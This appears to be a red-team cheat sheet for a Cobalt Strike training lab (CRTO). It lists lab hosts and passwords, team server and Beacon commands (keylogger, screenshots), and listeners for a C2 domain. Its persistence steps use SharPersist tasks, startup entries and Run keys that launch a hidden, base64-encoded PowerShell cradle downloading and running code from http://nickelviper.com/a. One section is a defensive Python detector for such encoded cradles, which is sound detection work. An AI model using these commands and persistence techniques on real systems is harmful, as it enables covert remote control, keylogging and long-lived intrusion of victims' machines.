CRTO Cheat Sheet

Lab info

red_team_ops_lab

Hosts

IP                             Name                  Hostname
10.10.255.244, 10.10.254.244   AdminBox
10.10.5.40                     Attacker Desktop      DESKTOP-3BSK7NO
10.10.5.50                     Attacker Linux        ubuntu
10.10.122.10                   Domain Controller 2   dc-2.dev.cyberbotic.io
10.10.120.100                  Elastic Stack         elk.cyberbotic.io
10.10.120.20                   Exchange Server       mail.cyberbotic.io
10.10.122.15                   File Share            fs.dev.cyberbotic.io
10.10.151.10                   MSP DC                ad.msp.org
10.10.5.250                    PowerDNS              powerdns
10.10.120.30                   SCM Server 1          scm-1.cyberbotic.io
10.10.120.25                   SQL Server 1          sql-1.cyberbotic.io
10.10.122.25                   SQL Server 2          sql-2.cyberbotic.io
10.10.122.254                  Squid Proxy           squid.dev.cyberbotic.io
10.10.150.10                   Studio DC             dc.dev.studio.com
10.10.122.30                   Web Server            web.dev.cyberbotic.io
10.10.123.101                  Workstation 1         wkstn-1.dev.cyberbotic.io
10.10.123.102                  Workstation 2         wkstn-2.dev.cyberbotic.io

Credentials

Username   Password    Hostname   Domain              Comments
bfarmer    Sup3rman               dev.cyberbotic.io
jking      Qwerty123              dev.cyberbotic.io
nlamb      F3rrari                dev.cyberbotic.io
nglover    BenNev!s               cyberbotic.io

Cobalt Strike

Team Server

From terminal

sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile # Use TMUX

As a Service

sudo nano /etc/systemd/system/teamserver.service

[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target

# Reload unit files after editing, then manage the service
sudo systemctl daemon-reload
sudo systemctl status teamserver.service
sudo systemctl start teamserver.service
sudo systemctl stop teamserver.service
sudo systemctl enable teamserver.service    # start automatically at boot
sudo systemctl disable teamserver.service

Beacon

# Basic
sleep <seconds> <jitter> # sleep 5 50
connect <target>
execute-assembly <path-tool> <params-tool> # Run a local .NET assembly in memory on the Beacon host
run netstat -anop tcp # View listening ports
jobs
jobkill <jid>

# Recon
net logons

clipboard
keylogger 
printscreen
screenshot
screenwatch

# DNS Beacon
checkin # Force the DNS Beacon to check in and send its session metadata (it stays idle until tasked otherwise)

Listeners

name       payload                              host / pipe                                      port   bind to     beacons                profile
dns        windows/beacon_dns/reverse_dns_txt   pics.nickelviper.com                             53                 pics.nickelviper.com   default
http       windows/beacon_http/reverse_http     nickelviper.com                                  80                 nickelviper.com        default
smb        windows/beacon_bind_pipe             TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (change the last 4 characters)
tcp        windows/beacon_bind_tcp                                                               4444   0.0.0.0
tcp-local  windows/beacon_bind_tcp                                                               4444   127.0.0.1

Recon

Host

execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system

Persistence

b64 Payload

Powershell Generate b64

$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

Linux Generate b64

str='IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
# bash: printf avoids echo's escape handling and the trailing newline; -w 0 keeps the base64 on one line
printf '%s' "$str" | iconv -t UTF-16LE | base64 -w 0

Task Scheduler

Beacon

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly
  • -t is the desired persistence technique.
  • -c is the command to execute.
  • -a are any arguments for that command.
  • -n is the name of the task.
  • -m is to add the task (you can also remove, check and list).
  • -o is the task frequency.

Startup Folder

Beacon

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add

Registry AutoRun

Beacon

cd C:\ProgramData
upload C:\Payloads\http_x64.exe
mv http_x64.exe updater.exe
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
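A defender-side counterpart to the b64 payload and persistence sections above, added here as an example that is not part of the original cheat sheet: it reverses the UTF-16LE/base64 encoding, pulls any `-EncodedCommand` blob (including the abbreviated `-e`/`-ec`/`-enc` forms) out of a command line such as a scheduled task action, a Run key value or a process creation log line, and flags download-cradle markers and URLs in the decoded text. The encoded string is the one used in the SharPersist commands on this page; the two sample command lines are constructed, and `triage_command_line` and the other names are this example's own.

```python
import base64
import binascii
import re

# Encoded command copied from the SharPersist examples on this page
# (UTF-16LE text, base64-encoded, as produced by the one-liners above).
PAGE_ENCODED = (
    "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA"
)


def encode_powershell_command(script):
    """Same transformation as the page's PowerShell/iconv one-liners: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(encoded):
    """Inverse of encode_powershell_command; returns None if the blob is not valid base64."""
    try:
        raw = base64.b64decode(encoded + "=" * (-len(encoded) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    # errors="replace" keeps an odd-length or garbage blob from raising mid-triage
    return raw.decode("utf-16-le", errors="replace")


# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
_PREFIXES = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)} | {"ec"}
ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)[-/](?:" + "|".join(sorted(_PREFIXES, key=len, reverse=True)) + r")\s+([A-Za-z0-9+/=]+)"
)

# Markers of the download-cradle pattern this page's payload uses (hypothetical, example-only names)
CRADLE_PATTERNS = {
    "iex": r"\b(?:iex|invoke-expression)\b",
    "webclient": r"\bnet\.webclient\b",
    "download": r"\bdownload(?:string|file|data)\b",
    "webrequest": r"\b(?:iwr|invoke-webrequest)\b",
}
URL_RE = re.compile(r"https?://[^\s\"'()<>]+")


def triage_command_line(cmdline):
    """Decode every -EncodedCommand blob in a command line (process creation event,
    scheduled task action, Run key value) and flag download-cradle markers."""
    blobs = ENC_FLAG.findall(cmdline)
    decoded = [d for d in (decode_powershell_command(b) for b in blobs) if d is not None]
    text = " ".join(decoded)
    markers = sorted(name for name, pat in CRADLE_PATTERNS.items() if re.search(pat, text, re.I))
    return {
        "decoded": decoded,
        "markers": markers,
        "urls": URL_RE.findall(text),
        "suspicious": bool(markers),
    }


# Constructed samples: the scheduled-task action built from this page's SharPersist
# command, and a benign administrative invocation for comparison.
SAMPLE_TASK_ACTION = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -enc " + PAGE_ENCODED
)
SAMPLE_BENIGN = r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"


if __name__ == "__main__":
    for line in (SAMPLE_TASK_ACTION, SAMPLE_BENIGN):
        print(triage_command_line(line))
```

The same function can be pointed at the `Actions` of exported scheduled tasks, at `HKCU\...\Run` values, or at Sysmon event 1 / Security 4688 command lines; a hit on all three cradle markers plus an external URL is the signature of the hourly "Updater" task and the startup-folder entry shown above.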

MS SQL Server

powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1